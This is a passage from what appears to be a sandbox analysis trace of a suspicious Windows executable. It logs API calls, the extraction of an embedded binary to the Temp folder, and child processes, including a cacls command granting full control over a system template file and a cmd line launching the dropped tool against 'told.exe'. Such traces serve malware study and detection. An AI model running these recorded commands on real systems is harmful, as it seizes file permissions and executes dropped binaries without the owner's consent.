[0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x36) returned 0x638380 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x48) returned 0x6383c0 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x52) returned 0x638410 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3c) returned 0x634e50 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x18) returned 0x638470 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x82) returned 0x638490 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2e) returned 0x638520 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1e) returned 0x636ab0 [0227.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2c) returned 0x638558 [0227.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x54) returned 0x638590 [0227.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x52) returned 0x6385f0 [0227.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2a) returned 0x638650 [0227.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3c) returned 0x634e98 [0227.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x54) returned 0x638688 [0227.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x24) returned 0x6386e8 [0227.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x30) returned 0x638718 [0227.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x8c) returned 0x638750 [0227.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638808 | out: hHeap=0x620000) returned 1 [0227.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x800) returned 0x6387e8 [0227.937] GetLastError () returned 0x0 [0227.937] SetLastError (dwErrCode=0x0) [0227.937] GetLastError () returned 0x0 [0227.937] SetLastError (dwErrCode=0x0) [0227.937] GetLastError () returned 0x0 [0227.937] SetLastError (dwErrCode=0x0) [0227.938] GetACP () returned 0x4e4 [0227.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x220) returned 0x638ff0 [0227.938] GetLastError () returned 0x0 [0227.938] SetLastError (dwErrCode=0x0) [0227.938] IsValidCodePage (CodePage=0x4e4) returned 1 [0227.938] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0227.938] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0227.938] GetLastError () returned 0x0 [0227.938] SetLastError (dwErrCode=0x0) [0227.938] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0227.938] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0227.938] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0227.938] GetLastError () returned 0x0 [0227.938] SetLastError (dwErrCode=0x0) [0227.938] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0227.938] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0227.938] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0227.938] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0227.938] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x18lh%äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0227.938] GetLastError () returned 0x0 [0227.938] SetLastError (dwErrCode=0x0) [0227.938] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0227.938] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0227.938] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0227.938] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0227.938] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x18lh%äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0227.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x80) returned 0x639218 [0227.939] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0227.939] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0227.939] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x639218) returned 0x80 [0227.939] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0227.939] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0227.939] GetCurrentProcess () returned 0xffffffff [0227.939] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0227.939] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0227.939] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0227.939] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0227.939] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0227.939] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0227.939] LockResource (hResData=0x43c648) returned 0x43c648 [0227.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x6396e8 [0227.940] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.940] GetLastError () returned 0x20 [0227.940] GetLastError () returned 0x20 [0227.940] SetLastError (dwErrCode=0x20) [0227.940] GetLastError () returned 0x20 [0227.940] SetLastError (dwErrCode=0x20) [0227.940] GetLastError () returned 0x20 [0227.940] SetLastError (dwErrCode=0x20) [0227.940] GetLastError () returned 0x20 [0227.940] SetLastError (dwErrCode=0x20) [0227.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1000) returned 0x639708 [0227.941] GetLastError () returned 0x20 [0227.941] SetLastError (dwErrCode=0x20) [0227.941] GetLastError () returned 0x20 [0227.941] SetLastError (dwErrCode=0x20) [0227.941] GetLastError () returned 0x20 [0227.941] SetLastError (dwErrCode=0x20) [0227.941] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e38c | out: lpMode=0x18e38c) returned 1 [0227.941] WriteFile (in: hFile=0x7, lpBuffer=0x18ea68*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e394, lpOverlapped=0x0 | out: lpBuffer=0x18ea68*, lpNumberOfBytesWritten=0x18e394*=0x49, lpOverlapped=0x0) returned 1 [0228.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6387e8 | out: hHeap=0x620000) returned 1 [0228.181] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0228.182] ExitProcess (uExitCode=0x1) [0228.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x637090 | out: hHeap=0x620000) returned 1 Process: id = "236" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x29541000" os_pid = "0x6ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 831 os_tid = 0x30c Thread: id = 835 os_tid = 0x710 Thread: id = 841 os_tid = 0xafc Process: id = "237" image_name = "werfault.exe" filename = "c:\\windows\\syswow64\\werfault.exe" page_root = "0x28546000" os_pid = "0x3a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "228" os_parent_pid = "0x85c" cmd_line = "C:\\Windows\\SysWOW64\\WerFault.exe -u -p 2592 -s 152" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 833 os_tid = 0xad8 Thread: id = 856 os_tid = 0x30c Thread: id = 858 os_tid = 0x92c Process: id = "238" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x285f0000" os_pid = "0x78c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "223" os_parent_pid = "0x540" cmd_line = "cacls \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\" /E /G 5p5NrGJn0jS HALPmcxz:F /C" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 836 os_tid = 0x5d8 Process: id = "239" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1c0d3000" os_pid = "0x690" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "194" os_parent_pid = "0x494" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"told.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 837 os_tid = 0x72c [0231.042] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x43f784 | out: lpSystemTimeAsFileTime=0x43f784*(dwLowDateTime=0x40d33660, dwHighDateTime=0x1d68287)) [0231.042] GetCurrentProcessId () returned 0x690 [0231.042] GetCurrentThreadId () returned 0x72c [0231.042] GetTickCount () returned 0x11652a3 [0231.042] QueryPerformanceCounter (in: lpPerformanceCount=0x43f77c | out: lpPerformanceCount=0x43f77c*=35138074471) returned 1 [0231.043] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0231.043] __set_app_type (_Type=0x1) [0231.043] __p__fmode () returned 0x770331f4 [0231.043] __p__commode () returned 0x770331fc [0231.044] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0231.044] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0231.044] GetCurrentThreadId () returned 0x72c [0231.044] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x72c) returned 0x60 [0231.044] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0231.044] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0231.044] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.879] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.879] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x43f714 | out: phkResult=0x43f714*=0x0) returned 0x2 [0231.879] VirtualQuery (in: lpAddress=0x43f74b, lpBuffer=0x43f6e4, 